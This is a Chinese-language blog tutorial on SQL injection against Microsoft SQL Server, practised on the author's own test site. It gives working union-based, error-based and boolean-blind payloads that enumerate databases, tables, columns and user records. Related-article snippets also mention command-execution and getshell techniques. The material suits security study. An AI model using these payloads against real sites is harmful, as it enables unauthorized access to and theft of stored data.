SQL注入-基于MSsql(sql server)的注入

已于 2022-02-13 23:47:33 修改
阅读量5.3k 收藏 21
点赞数 7
分类专栏: SQL注入 文章标签: sqlserver sql 数据库 网络安全 web安全
于 2022-02-13 19:26:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LJH1999ZN/article/details/122911809
版权

目录

一、如何判断该网站使用的是sql server 数据库

二、sql server 数据库包含三张主要系统表

三、sql server 主要函数

四、数据库的注入流程

五、sql server 的联合查询

六、sql server 的报错注入

七、sql server 的布尔型盲注。

一、如何判断该网站使用的是sql server 数据库

  • 根据后缀判断:如果后缀为aspx,数据库大概是sql server
  • 根据报错信息判断,报错信息中有Microsoft 字样。
  • 根据系统表判断,and (select count(*)from sysdatabases) >0 ,如果成立的话,则说明它里边含有这个系统表,可以判断为sql server 数据库 sql server 数据库包含三张主要系统表

二、sql server 数据库包含三张主要系统表

  1. sysdatabases :这张表保存在master数据库中,里边的name字段下存放的是所有数据库的库名。 
  2. sysobjects:这张表保存的是数据库的表的信息,里边的id字段存放的是表的id,name为表名,xtype 字段存放的是表的类型,u代表为用户创建的表,s表示该表是系统表。
  3. syscolumns:这张表存放的是数据库中字段的信息,id 为表的id,该id可以通过sysobjects获得。name为字段名称。

三、sql server 主要函数

  1. host_name() :返回服务器端主机名称。
  2. current_user():返回当前数据库用户。
  3. db_name():返回当前数据库库名 。
  4. char():将ASCII码转化为对应的字符。
  5. ASCII():将字符转化为对应的ASCII码。
  6. substring():截取字符串。

四、数据库的注入流程

  1. 获取数据库名称
  2. 获取数据库中表的名称
  3. 获取数据库中表的列名
  4. 获取对应的数据 

五、sql server 的联合查询

1.使用union关键字

2.使用union联合查询注意事项 

  • 首先还是需要知道查询的列数,使用order by n 进行判断 n表示具体列数。
  • sql server 数据库与MySQL数据库不同的是,sql server 数据库前后的数据类型必须一致。
  • 判断出数据的显示位置。
  • 使得先前的查询结果为空。

3.sql server 数据库使用联合查询的演示。

注:该网站为个人搭建的网站,不可利用真实网站进行攻击。

3.1首先判断注入点,其次判断注入类型 

加入单引号,发现有报错信息 

3.2 直接使用2-1判断其数据类型

发现页面回显成功,所以可以确定为数字型,接下来使用union联合查询

3.3 使用order by 判断其列数

可以发现列数为13列

3.4 确认每列的数据类型,所以发现数据类型不兼容,可以使用null 做替换

当我们全部使用null时,发现还是不对,产生这一错误的原因是union语句合并查询时是默认去除重复项的,也就是默认执行了distinct操作。

因此需要将union 改为 union all 不去除重复项,就能够解决这个报错。一般到这里之后就可以直接接着往下获取数据库了, 但是这里的环境有报错了,说明查询出来的时候,还存在数据类型不匹配,继续从头替换为null ,直到不报错为止。最终确定为3,4,6,7,10,11为字符 , 1,2,5,8,9,12,13为数字型

3.5 现在可以首页联合查询获取数据库的相关信息

3.5.1 获取数据库库名

payload:id=1  UNION all SELECT 1,2,name,null,5,null,null,8,9,null,null,12,13 from master..sysdatabases

3.5.2 获取当前数据库的库名

payload:id=1  UNION all SELECT 1,2,db_name(),null,5,null,null,8,9,null,null,12,13 from master..sysdatabases

3.5.3 获取数据库中的表名

payload:id=1  UNION all SELECT 1,2,name,null,5,null,null,8,9,null,null,12,13 from jiaofan..sysobjects where xtype = 0x75 

3.5.4 获取当前表名的字段

payload:id=1  UNION all SELECT 1,2,name,null,5,null,null,8,9,null,null,12,13 from jiaofan..syscolumns where id = (select id from jiaofan..sysobjects where name = 0x73006C005F007500730065007200)

5.3.5 获取字段下具体的值

payload:id=1  UNION all SELECT 1,2,shouji,null,5,youxiang,null,8,9,null,null,12,13 from  sl_user

六、sql server 的报错注入

与其他数据库报错注入类似。

1.sql server 报错注入的演示

1.1获取当前数据库

payload:id=1  and 1=(select db_name())

1.2获取所有数据库(由于我们使用的是and 1= ()进行的报错,所以一次只能获取一个值,这时可以使用top函数)

payload:id=1  and 1= (select top 1 name from master..sysdatabases) 

如果想获取第二行数据,

payload:id=1  and 1= (select top 1 name from master..sysdatabases where name not in( select top 1 name from master..sysdatabases )) 

1.3获取当前数据库的表名

payload:id=1 and 1= (select top 1 name from jiaofan..sysobjects where xtype = 0x75) 

1.4获取表中的字段名

由于涉及到两张表,所以可以将两张表联合起来

payload:id=1 and 1= (select top 1 c.name from jiaofan..syscolumns c ,jiaofan..sysobjects o where c.id = o.id and o.name =0x73006C005F007500730065007200 ) 

七、sql server 的布尔型盲注。

1.sql server 布尔型盲注的演示

1.1获取数据库的数据库个数

payload:id=1 and (select count(*) from master..sysdatabases) >7

 id=1 and (select count(*) from master..sysdatabases) >8

1.2获取当前数据库的信息

payload:id=1 and substring((select db_name()),1,1)=char(106)

一句话木马
关注
  • 7
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
SQL注入之Mssql注入
qq_57307348的博客
02-16 5443
sql注入之mssql注入基础
SQL注入——mssql注入
cldimd的博客
03-19 2335
1、Mssql权限问题 Mssql角色: 服务器角色--针对运行整个数据库服务器设定的角色和权限。 数据库角色--针对某个特定数据库设定的角色和权限。 固定服务器角色 sysadmin 可以在 SQL Server 中执行任何活动。 serveradmin ...
SQLServer数据库注入详解
热门推荐
谢公子的博客
06-28 2万+
目录 SQLServer数据库 修改默认1433端口 SQLServer数据库的管理 SQLServer数据库的查询语句 SA权限开启xp_cmdshell获取主机权限 SA权限使用sp_oacreate执行系统命令 DB_owner权限LOG备份Getshell DB_owner权限差异备份Getshell 盲注SQLServer数据库 SQLServer数据库 SQL S...
SQL注入漏洞(MSSQL注入
errorr0
07-05 2406
MSSQL注入的入门讲解
SQL Server注入
最新发布
余十步的博客
06-01 605
原理:凡是在group by后面出现的字段,必须同时在select后面出现;凡是在select后面出现的、同时未在聚合函数中出现的字段,必须同时出现在group by后面。原理:试图将一个字符串与非字符串基本,或将一个字符串转换为另一个不兼容的类型时,那么SQL编辑器会抛出异常。不嵌入子查询:常用内置函数(conver或者case函数:将一种数据类型转换为另一种数据类型)也可以通过定义十六进制的SQL语句,使用exec函数执行。语句执行正常代表数据类型兼容,就可以将x换位SQL语句(如利用视图查询)
SQLServer数据库注入测试
Jietewang的博客
04-11 1030
Part one:How phpstudy connects to SQL Server 2008 总结一下:使用PHPstudy集成环境中的php5.4.45连接SQL server 2008相关坑点。 在百度上能搜索到的大部份方法都是有效的,但是如果你是一个运气不太好的新手的话估计就要耗费你太多的精力。 首先需要明白的是Windows下的安装的PHPstudy集成环境是不能直接使用PHP连接数据库SQL Server 2008。这本身就是一个很恼火的事情,随着时代的进步,科技的发展,现在的人儿啊尽
SQL Server手工注入方式
good good study
01-04 5718
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
MSSQL数据库注入(一)
hhhshd的博客
11-17 5368
1. MSSQL注入手工联合注入 mssql数据库相比mysql数据库本质上的框架是差不多的,使用的增,删,改,查命令是互相通的,mysql中使用的函数在mssql中有些会起不到作用点。 (例如:在mssql中只能用top 取代limt 0,N,row_number() over()函数取代limit N,M) mssql在使用上和可移植等方面与mysql存在不同的差异。 MSSQL数据库的基本知识 MSSQL中自带数据库信息 库名 相关功能 master 系统控制数据库,包含配置信
SQL Server 注入
mingyqf的博客
03-22 2398
SQL Server 注入 (转至:https://www.1024sou.com/article/798425.html) 侵删 一、简介 SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端口号为1433。数据库后缀名 .mdf,注释符是 – sa权限:数据库操作,文件管理,命令执行,注册表读取等 (数据库最高权限system) db权限:文件管理,数据库操作等权限 users-administrators **public权限:**数
网络安全进阶学习第十四课——MSSQL注入
p36273的博客
08-07 2044
and 1=convert(int,(select quotename(name) from 数据库名.dbo.sysobjects where xtype=‘U’ FOR XML PATH(‘’))) –主要字段有:name(表名)、id(表 ID)、xtype(创建的对象)。and 1=(select top 1 * from 指定数据库.dbo.指定表名 where排除条件 FOR XML PATH(‘’))–举例:replace(‘1-a 2-b’,’-’, ’:’),返回结果是:1:a 2:b。
SQL注入基础
屿的博客
02-14 4452
各位靓仔们是否经常听到sql注入呢,那么什么是sql注入?引用微软官方的语言来说:SQL 注入是一种攻击方式,在这种攻击方式中,在字符串中插入恶意代码,然后将该字符串传递到 SQL Server 的实例以进行分析和执行。构成 SQL 语句的任何过程都应进行注入漏洞审阅,因为 SQL Server 将执行其接收到的所有语法有效的查询。一个有经验的、坚定的攻击者甚至可以操作参数化数据。那么接下来,让我们来了解一下sql注入是如何产生的。
09-sql注入-mssql1
08-03
SQL注入是一种常见的安全漏洞,攻击者通过输入恶意SQL语句来获取未授权的数据或执行恶意操作。针对SQL Server,攻击者可能使用的注入技术包括: 1. 判断是否存在注入漏洞。 2. 确定数据库类型。 3. 猜测表名和字段。...
SQL注入之MSSQL注入MSSQL⼿⼯注⼊
12-29
sql注入,SQL注入之MSSQL注入MSSQL⼿⼯注⼊ 测试使⽤Windows Server 2008 R2 中使⽤IIS搭建的MSSQL-SQLi-Labs站点的第⼀关(该站点可在Github中找到
访问SQLServer - springboot自定义DBUtil(druid连接池)操作SQLServer数据库
03-10
Spring-Boot通过druid连接池获取连接操作SQLServer数据库 总结:【共3步】 第1步:添加druid和MSSQL Driver的依赖项; 第2步:配置连接字符串; 第3步:创建数据库操作类,使用@Bean注入DruidDataSource, 然后根据...
sql注入源码(mssql,mysql)
03-15
这个主题的压缩包文件包含了一系列与SQL注入攻击相关的源代码,主要针对Microsoft SQL Server (MSSQL) 和 MySQL数据库系统。下面我们将深入探讨这些知识点。 首先,`mssql`和`mysql`是两种广泛使用的数据库管理系统...
SQL注入漏洞-Mssql报错注入
HacHunter的博客
03-07 2093
MssqlSql Sever,SQL Server 是Microsoft 公司推出的关系型数据库管理系统,Sql Sever通常与IIS服务器搭配使用。 在mssql注入过程中,经常用到一些mssql中的系统函数,这些系统函数有助于帮助获取目标站点的信息: User;user_name();system_user用户 db_name():当前数据库的名字 host_name():主机名字 @@version:数据库版本 @@servername:服务器名称 @@language:当前所使用语
SQL注入方法-报错注入
acepanhuan的博客
02-11 1005
SQL注入方法-报错注入
网络安全-SQL注入(4)】一篇文章带你了解sql server数据库三大权限,以及三大权限的SQL注入SQL注入点利用以及getshell
m0_67844671的博客
10-02 2156
网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】-CSDN博客本篇文章以凡诺企业网站管理系统为例,讲解了access数据库是如何进行SQL注入的,以及注入点如何利用,如何判断查询字段个数,如果用联合查询爆出数据库数据等;【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】;
nodejs sqlserver
08-28
Node.js可以使用多个模块来连接和操作SQL Server数据库,其中最常用的是mssql模块。以下是在Node.js中连接和查询SQL Server的基本示例: 1. 安装 mssql 模块 ``` npm install mssql ``` 2. 连接到 SQL Server 数据库 ```javascript const sql = require('mssql') const config = { user: 'username', password: 'password', server: 'localhost', database: 'database-name' } sql.connect(config, (err) => { if (err) console.log(err) else console.log('Connected to SQL Server') }) ``` 3. 查询数据 ```javascript const sql = require('mssql') const config = { user: 'username', password: 'password', server: 'localhost', database: 'database-name' } sql.connect(config, (err) => { if (err) console.log(err) else { const request = new sql.Request() request.query('SELECT * FROM table-name', (err, result) => { if (err) console.log(err) else console.log(result) }) } }) ``` 这是一个基本示例,你可以使用mssql模块执行更高级的操作,如参数化查询和存储过程。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一句话木马

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值